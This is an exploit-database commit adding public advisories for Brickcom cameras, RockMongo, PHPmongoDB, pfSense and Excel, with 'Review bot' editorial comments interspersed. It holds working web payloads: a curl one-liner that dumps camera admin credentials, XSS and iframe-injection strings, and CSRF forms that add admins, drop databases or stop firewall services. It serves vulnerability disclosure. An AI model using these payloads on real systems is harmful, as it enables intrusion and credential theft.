DB: 2016-04-15

6 new exploits

RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities
Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)
pfSense Firewall <= 2.2.6 - Services CSRF
Brickcom Corporation Network Cameras - Multiple Vulnerabilities
PHPmongoDB 1.0.0 - Multiple Vulnerabilities
Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
This commit is contained in:
Offensive Security 2016-04-15 05:03:51 +00:00
parent 1e62f55c1a
commit b185ddf9b2
7 changed files with 1468 additions and 0 deletions


@ -35902,6 +35902,7 @@ id,file,description,date,author,platform,type,port
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
@ -35911,3 +35912,8 @@ id,file,description,date,author,platform,type,port
39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0
39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0
39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443
39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80
39698,platforms/windows/remote/39698.html,"Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0
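Review bot: the 39698 description writes the IE versions as `9_ 10_ 11`; the description field is already double-quoted (as in every other row of this hunk), so plain commas would survive the CSV parse and read better in search. Also check 39694: its description promises Remote Code Execution, but the row is filed under type `dos`; one of the two should change so the listing and the category agree.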



@ -0,0 +1,394 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-12
www.orwelllabs.com
twt:@orwelllabs
sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
[+] surveillance is the business model
of the internet - OK!
sm1thw@0rw3lll4bs:~/bb# echo $?
6079
Adivisory Information
=====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Adivisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes
p4n0pt1c0n
I. Insecure Direct Object Reference/Authentication Bypass
II. Sensitive information in plaintext
III. Hard-coded Credentials
IV. Cross-site scripting
V. Basic Authentication
VI. Cross-site Request Forgery
Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."
These products are used as video surveillance system by costumers and
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.
* notes:
- some firmwares affected (item 'affected products' are very recent, having
been launched
a few months ago, and still vulnerable ... so this is an structural/legacy
problem.
- sensitive information presented in this advisory are fake.
I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
- syslog.dump
Path: Maintenance -> Configuration -> 'Export'
+ configfile.dump
An unauthenticated GET request to the script "configfile.dump", as follows:
http://xxx.xxx.xxx.xxx/configfile.dump?action=get
or like this
http://xxx.xxx.xxx.xxx/configfile.dump.backup
http://xxx.xxx.xxx.xxx/configfile.dump.gz
or just
http://xxx.xxx.xxx.xxx/configfile.dump
returns all camera settings
[..code_snip..]
DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.macAddress=00:00:00:00:00:00
DeviceBasicInfo.sensorID=OV9X11
DeviceBasicInfo.internalName=Brickcom
DeviceBasicInfo.productName=Di-1092AX
DeviceBasicInfo.displayName=CB-1092AX
DeviceBasicInfo.modelNumber=XXX
DeviceBasicInfo.companyName=Brickcom Corporation
DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
DeviceBasicInfo.companyUrl=www.brickcom.com
DeviceBasicInfo.serialNumber=AXNB02B211111
DeviceBasicInfo.skuType=LIT
DeviceBasicInfo.ledIndicatorMode=1
DeviceBasicInfo.minorFW=1
DeviceBasicInfo.hardwareVersion=
DeviceBasicInfo.PseudoPDseProdNum=P3301
AudioDeviceSetting.muted=0
[..code_snip..]
and all credentials including the administrator account, like this:
UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user
pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name <<<--- (commom)
username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
[snip]
BasicNetworkSetting.pppoe.password= <<<--- ppoe user
BasicNetworkSetting.pppoe.username= <<<--- ppoe pass
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username= <<<--- dyndns user
DDNSSetting.dyndns.password= <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username= <<<--- and here...
DDNSSetting.tzodns.password= <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username= <<<--- here
DDNSSetting.noipdns.password= <<<--- here
DDNSSetting.noipdns.hostname=
and many others...
- Path: System -> System Log -> 'Save to File'
+ syslog.dump
- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get
- Response:
[..code_snip..]
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014
[..code_snip..]
Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0"
configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target
seems not be vulnerable, Mr. Robot! \n"
IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username,
password and privilege level (1:admin), like this:
password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN
and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:
"[-] The target seems not bet vulnerable, Mr. Robot!"
II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are store in plaintext.
III. Hard-coded Credentials
---------------------------
All credentials and other sensitive information can be found in html page
user_management_config.html,
Just viewing the html source code:
view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html
<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);
User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";
User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";
IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=
REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=
V. Basic Authentication
-----------------------
The response asks the user to enter credentials for Basic HTTP
authentication.
If these are supplied, they will be submitted over clear-text HTTP (in
Base64-encoded form).
V. Cross-site Request Forgery
-----------------------------
# To add an administrative credential: "brickcom:brickcom"
> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="index" value="0" />
<input type="hidden" name="username" value="brickcom" />
<input type="hidden" name="password" value="brickcom" />
<input type="hidden" name="privilege" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# to remove this credential:
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="brickcom" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
affected products
-----------------
(+) various products, including models:
Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)
Vandal Dome Cameras
-------------------
Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)
Bullet Cameras
--------------
Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)
Mini Dome Camera
----------------
Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)
Cube Camera
-----------
Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)
Fixed Dome Camera
-----------------
Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
Timeline
++++++++
2015-03-20 - Issues discovered
2015-03-30 - attempt to contact Vendor
2015-12-12 - attempt to assign CVE
2016-04-12 - Not easy way to contact vendor, (ON Twitter) the last tweet
was 2011-01-31...
2016-04-14 - Full disclosure
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.
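Review bot: the annotations on the PPPoE lines are swapped: `BasicNetworkSetting.pppoe.password=` is marked `<<<--- ppoe user` and `BasicNetworkSetting.pppoe.username=` is marked `<<<--- ppoe pass`; swap the two comments (and spell it PPPoE). The section numbering also drifts: the index lists Cross-site Request Forgery as VI, but the body has two sections labelled `V.` (Basic Authentication and Cross-site Request Forgery), and `Adivisory` should read `Advisory` in the banner and in the `Adivisory Information` / `Adivisory-URL` fields. The Basic Authentication finding names no script or path, unlike every other item; add the affected URL so it can be verified. Minor: the PoC's failure message (`seems not be vulnerable`) and the quoted one a few lines later (`seems not bet vulnerable`) differ; make them match.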

platforms/php/webapps/39682.txt Executable file

@ -0,0 +1,394 @@
#########################################################################################################################################################
# Exploit Title: RockMongo v1.1.8 - PHP MongoDB Administrator Multiple
Vulnerabilities
# Date: 11.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://rockmongo.com
# Software Link: https://github.com/iwind/rockmongo
# Version: [app version] 1.1.8
#########################################################################################################################################################
What is RockMongo?
RockMongo, a MongoDB administration tool, written in PHP5, is Best in PHP
world, more like PHPMyAdmin. source = http://rockmongo.com
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
XSS details:
#########################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
db
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(3)</script>
#########################################################################################################################################################
XSS4 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#########################################################################################################################################################
XSS5 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<script>alert(5)</script>
#########################################################################################################################################################
XSS6 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Cscript%3Ealert%286%29%3C/script%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<script>alert(6)</script>
#########################################################################################################################################################
XSS7 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Cscript%3Ealert%287%29%3C/script%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><script>alert(7)</script>
#########################################################################################################################################################
XSS8 (Reflected)
URL
http://localhost/rockmongo/index.php/"><script>alert(8)</script>
METHOD
Get
PARAMETER
URL
PAYLOAD
"><script>alert(8)</script>
#########################################################################################################################################################
HTML Injection details:
#########################################################################################################################################################
HTML Injection1
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username,db
PAYLOAD
"><iframe src=http://www.rockmongo.com></iframe>
#########################################################################################################################################################
HTML Injection2
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection3 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection4
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection5
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Ciframe%20src=http://www.rockmongo.com%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection6
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Ciframe%20src=http://www.rockmongo.com%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
CSRF details:
#########################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.createDatabase"
method="POST">
<input type="text" name="name" value="exploit-db" />
<input type="submit" value="Create DB" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.dropDatabase" method="POST">
<input type="text" name="db" value="exploit-db"/>
<input type="hidden" name="confirm" value="1"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.newCollection&db=exploit-db"
method="POST">
<input type="text" name="name" value="exploit-Collection" />
<input type="submit" value="Create Collection" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF4
Drop Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=exploit-db"
method="POST">
<input type="text" name="collection" value="exploit-Collection"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF5
Add Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.addUser&db=admin"
method="POST">
<input type="text" name="username" value="test"/>
<input type="text" name="password" value="test"/>
<input type="text" name="password2" value="test"/>
<input type="submit" value="Add User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF6
Delete Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.deleteUser&db=admin"
method="POST">
<input type="text" name="user" value="test"/>
<input type="submit" value="Remove User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF7
Command Execute
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.command&" method="POST">
<input type="text" name="command" value="{ listCommands: 1 }"/>
<input type="text" name="db" value="admin"/>
<input type="text" name="format" value="json"/>
<input type="submit" value="Command Execute"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF8
Execute Code
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.execute&db=admin"
method="POST">
<input type="text" name="code" value="function () { var plus = 1 + 2;
return plus; }"/>
<input type="text" name="db" value="admin"/>
<input type="submit" value="Execute Code"/>
</form>
</body>
</html>
#########################################################################################################################################################
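Review bot: CSRF7's form action `index.php?action=server.command&` ends in a dangling `&`; drop it, or put `db=admin` there as the CSRF8 form does, since the `db` value is otherwise sent only in the POST body. For XSS5 and HTML Injection4 the URL already carries `db=test` while the listed parameter is the POST field `db`; state which of the two is reflected so the finding can be reproduced.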

platforms/php/webapps/39695.txt Executable file

@ -0,0 +1,77 @@
# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps
1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.
2. Proof of Concept
Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following POCs:
Start NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="startservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Stop NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Restart NTPD service:
POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="restartservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The service will automatically start/stop.
Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="apinger" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
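Review bot: the Software Link points at `pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz` while the title and Version line say 2.2.6 and below; link the 2.2.6 release or note that the 2.2.5 image is the one that was tested. The four forms carry no `method` attribute, so the browser submits them as GET; the Description should say that `status_services.php` accepts `mode` and `service` on a GET request, since the PoC depends on that. Also, the login step says `http://192.168.0.1` while the forms target `https://192.168.0.1`; use one scheme.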

platforms/php/webapps/39697.txt Executable file

@ -0,0 +1,283 @@
#################################################################################################################################################
# Exploit Title: PHPmongoDB v1.0.0 - Multiple Vulnerabilities [CSRF |
HTML(or Iframe) Injection | XSS (Reflected & Stored)]
# Date: 14.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmongodb.org
# Software Link: https://github.com/phpmongodb/phpmongodb
# Version: 1.0.0
#################################################################################################################################################
Introduction
A Tool available for administrative work of MongoDB over Web. It is
PHPmongoDB. source = http://www.phpmongodb.org
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
CSRF details:
#################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Save"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Drop"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/CreateCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Drop Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/DropCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Drop Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Execute Code
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Server/Execute"
method="POST">
<input type="text" name="code" value="db.getCollectionNames()"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Execute Code"/>
</form>
</body>
</html>
#################################################################################################################################################
Logout
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Login/Logout"
method="POST">
<input type="submit" value="Logout"/>
</form>
</body>
</html>
#################################################################################################################################################
HTML Injection details:
#################################################################################################################################################
HTML Injection1
URL
http://localhost/phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><iframe src=http://www.phpmongodb.org>
#################################################################################################################################################
HTML Injection2
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection3
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
METHOD
Get
PARAMETER
db
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection4 (Stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253E%253Ciframe%2520src%253Dhttp%253A%252f%
252fwww.phpmongodb.org
%253E&size=&max=&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS details:
#################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/phpmongodb/index.php/%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><script>alert(1)</script>
#################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253cscript%253ealert%25282%2529%253c%252fscript%253e&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253cscript%253ealert%25282%2529%253c%252fscript%253e
#################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253cscript%253ealert%25283%2529%253c%252fscript%253e
METHOD
Get
PARAMETER
db
PAYLOAD
%253cscript%253ealert%25283%2529%253c%252fscript%253e
#################################################################################################################################################
XSS4 (stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253Cscript%253Ealert%25284%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253Cscript%253Ealert%25284%2529%253C%252fscript%253E&size=&max&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS5 (Stored)
http://localhost/phpmongodb/index.php?load=Server/Execute
METHOD
Post
PATAMETER
db
PAYLOAD
%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php?load=Server/Execute HTTP/1.1
code=db.getCollectionNames%28%29&db=db%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
#################################################################################################################################################
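Review bot: the XSS5 entry (the `?load=Server/Execute` case) is missing the `URL` label line that every other entry carries, and its `PATAMETER` label is a typo for `PARAMETER`; likewise `XSS4 (stored)` should be capitalised `(Stored)` to match the other headings. The HTML Injection4 request body, on the three lines starting `collection=testcollection%253E...`, has been wrapped mid-value and should be a single line like the XSS4 and XSS5 requests. All payloads are written double URL-encoded (`%253C` decodes to `%3C`, i.e. `<`), so a reader reproducing the report has to decode twice before the value becomes markup; saying so once at the top of the XSS details would avoid confusion. From the mitigation side, the shared root cause across every entry is that the `collection` and `db` values are reflected into the page without HTML output encoding, and that is the fix the vendor needs to apply at the output points, not per-payload filtering.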

platforms/windows/dos/39694.txt Executable file

@ -0,0 +1,50 @@
#######################################################################################
# Title: Microsoft Office Excel Out-of-Bounds Read Remote Code Execution
# Application: Microsoft Office Excel
# Affected Products: Microsoft Office Excel 2007,2010,2013,2016
# Software Link: https://products.office.com/en-ca/excel
# Date: April 12, 2016
# CVE: CVE-2016-0122 (MS16-042)
# Author: Sébastien Morin from COSIG
# Contact: https://twitter.com/COSIG_ (@COSIG_)
# Personal contact: https://smsecurity.net/; https://twitter.com/SebMorin1 (@SebMorin1)
#######################################################################################
===================
Introduction:
===================
Microsoft Excel is a spreadsheet developed by Microsoft for Windows, Mac OS X, and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. It has been a very widely applied spreadsheet for these platforms, especially since version 5 in 1993, and it has replaced Lotus 1-2-3 as the industry standard for spreadsheets. Excel forms part of Microsoft Office.
(https://en.wikipedia.org/wiki/Microsoft_Excel)
#######################################################################################
===================
Report Timeline:
===================
2016-02-06: Sébastien Morin from COSIG report the vulnerability to MSRC.
2016-02-16: MSRC confirm the vulnerability.
2016-04-12: Microsoft fixed the issue (MS16-042).
2016-04-13: Advisory released.
#######################################################################################
===================
Technical details:
===================
This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file (.xlsm). An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
#######################################################################################
==========
POC:
==========
https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39694.zip
#######################################################################################
